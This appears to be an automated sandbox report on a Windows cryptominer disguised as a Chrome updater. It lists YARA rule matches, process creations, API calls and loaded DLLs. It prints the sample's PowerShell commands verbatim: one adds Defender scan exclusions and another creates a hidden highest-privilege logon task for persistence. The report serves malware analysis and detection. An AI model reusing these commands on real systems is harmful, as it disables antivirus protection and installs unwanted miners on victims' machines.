Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25

Source: classification engine

Classification label: mal100.troj.evad.mine.winEXE@24/79@0/2

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB32328 VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,FindResourceExA,SizeofResource,LoadResource,LockResource,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,SleepEx,

4_2_00007FF78AB32328

Source: C:\Windows\System32\dialer.exe

Code function: 4_2_00007FF78AB31AC4 SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,

4_2_00007FF78AB31AC4

Source: C:\Windows\System32\dialer.exe

4_2_00007FF78AB32328

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File created: C:\Users\user\AppData\Roaming\Google

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp

Jump to behavior

Source: ylVAEHbMLf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ylVAEHbMLf.exe

ReversingLabs: Detection: 55%

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe

File read: C:\Users\user\Desktop\ylVAEHbMLf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ylVAEHbMLf.exe "C:\Users\user\Desktop\ylVAEHbMLf.exe"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ylVAEHbMLf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: ylVAEHbMLf.exe

Static file information: File size 5980672 > 1048576

Source: ylVAEHbMLf.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x592e00

Source: ylVAEHbMLf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
